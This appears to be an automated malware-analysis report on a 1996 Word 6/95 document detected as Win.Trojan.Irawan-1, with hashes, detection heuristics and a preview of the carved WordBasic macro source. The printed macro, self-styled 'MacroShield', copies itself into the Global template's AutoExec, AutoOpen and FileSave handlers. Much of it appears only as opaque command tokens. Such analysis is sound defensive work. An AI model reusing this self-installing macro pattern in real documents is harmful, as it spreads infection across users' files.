Win.Trojan.Irawan-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 550a1d41e51d7f38…

MALICIOUS

Office (OLE)

11.5 KB First seen: 2012-06-14
MD5: 74b2c75661b0999ed1c0009c67207813 SHA-1: f175e92c6fc2ed36af4946ff702fb14f12ae9ca7 SHA-256: 550a1d41e51d7f38b0164ad01a5b3de15a22ac6116e8327ad1d734a47f6512bc
102 Risk Score

Malware Insights

Win.Trojan.Irawan-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers and is explicitly detected by ClamAV as Win.Trojan.Irawan-1. The document body contains numerous references to 'RSN MACRO VIRUS' and 'MacroShield', indicating its purpose is related to macro virus functionality, likely for spreading or removal of other macros, but in this context, it is the malicious payload itself.

Heuristics 3

  • ClamAV: Win.Trojan.Irawan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Irawan-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 5190 bytes
SHA-256: e4cb9a42306c261e81015f8d5410bb513e3b7aafe41b8cbc90a95bc4e5c9594c
Preview script
First 1,000 lines of the extracted script
, = = = =     11876               11876           21349 21349     11876           21349 21349     11876           20325 8292    
              356 8292 @cmd6e75   REM menghapus makro yang diidentifik sebagai virus. (c) 1996 B. Irawa  
MAIN
REM *********************************************************
REM * MacroShield, macro virus remover                      *
REM * Copyright (c) 1996 B. Irawan D                        * 
REM * 3rd Beta Release in Dec, 9 1996                       *
REM * Thanks to 1. 'Ci, you're my everything...             *
REM *           2. Denny & Dhonny, thank's for your support * 
REM *           3. All of my friend in OS III/96            *
REM *           4. All of my frien in STTTelkom '91         *
REM *********************************************************  
"MacroShield, macro virus remover"
MAIN
, - * Dayeuhkolot
sMe$ = @cmd8025
sMacro$ = SMe$ = ":Autoexec"
@cmd80c2 sMacro$ , "Global:Autoexec"
sMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 sMacro$ , "Global:AutoOpen"
sMacro$ = SMe$ = ":FileSave"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = SMe$ = ":FileSaveAs"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = SMe$ = ":FileOpen"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = SMe$ = ":MacroShield"
@cmd80c2 sMacro$ , "Global:MacroShield" 29807
MAIN
MacroShield
MAIN
, - * STTTelkom
@cmd0053
dlg @cmd0054
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , STMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
MAIN
, - * STTTelkom
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
REM *********************************************************
REM * MacroShield, macro virus remover                      *
REM * Copyright (c) 1996 B. Irawan D                        * 
REM * 3rd Beta Release in Dec, 9 1996                       *
REM * Thanks to 1. 'Ci, you're my everything...             *
REM *           2. Denny & Dhonny, thank's for your support * 
REM *           3. All of my friend in OS III/96            *
REM *           4. All of my friend in STTTelkom '91        *
REM *********************************************************  
MAIN
multiFileMsg$ = "Anda tidak dapat membuka beberapa file bersamaan jika  MacroShield terinstal. Yang pertama anda pilih akan dibuka."
spTitle$ = "MacroShield"
@cmd800f @cmd80b5 1 , "Macintosh" 0
wordVerCode = 0
@cmd800f @cmd80b5 1 , "Windows 3." 0
wordVerCode = 1
@cmd8008 @cmd80b5 2 , 1 = "6"
wordVerCode = 2
wordVerCode = 3
@cmd8111 0
@cmd809e
, - * ErrHandler
@cmd80d6 1
, - * 0
* StartOpen
29285
@cmd0209
@cmd80d6 1
Err = 0
dlg @cmd0050
dlg
file$ =
resp = dlg
resp = 0 wordVerCode 3 * EndFunc
fileList$ = Dlg
wordVerCode
1 REM WinWord 6 
@cmd800f fileList$ , " " 0
separator = @cmd800f fileList$ , " "
fnameLen = separator 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
2 REM Winword NT
quotePos = @cmd800f 2 , fileList$ , @cmd8005 34
spacePos = @cmd800f fileList$ , " "
listLen = @cmd8003 fileList$
quotePos = 0 spacePos 0
fnameLen = spacePos 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
quotePos 0 quotePos listLen
fnameLen = quotePos
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
3 REM Winword 7
Resp = 0
@cmd8003 fileList$ 0
file$ = firstFile$ fileList$
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
* EndFunc
dlg = file$
dlg = 1
6501
, - * ErrHandler2
@cmd0050 dlg
, - * 0
* ScreenSwitch
29285
Err = 0
* EndFunc
=
file$ = @cmd8025
DlgFSA @cmd0054
DlgFSA
DlgFSA = 1 @cmd80b7 1 0 screenOpen file$
@cmd809e 0
, - * ErrHandler3
@cmd80d6 0
* EndFunc
29285
@cmd0209
@cmd80d6 0
Err = 0
=
screenOpen file$
autoopen$ = "autoopen"
HasAutoOpen = 0
MacroCount = @cmd80b7 1
i = 1 MacroCount
MacName$ = @cmd80b8 i , 1
@cmd80b0 MacName$ = autoopen$ HasAutoOpen = 1
i
OpenItClean file$ =
OpenItClean file$
@cmd80a0 2
, - * ErrHandler
@cmd004f = file$
, - * ErrHandler
@cmd0057 =
, - * 0
, - * ErrHandler2
@cmd8024
* EndFunc
29285
@cmd0209
@cmd0057 =
@cmd8024
Err = 0
29285
Err = 0 =
@cmd0054 = file$
firstFile$ FileList$
@cmd8008 FileList$ , 1 = @cmd8005 34
separator = @cmd800f 2 , FileList$ , @cmd8005 34
fnameLen = separator 2
firstFile$ = @cmd800a FileList$ , 2 , fnameLen
separator = @cmd800f FileList$ , " "
fnameLen = separator 1
firstFile$ = @cmd800a FileList$ , 1 , fnameLen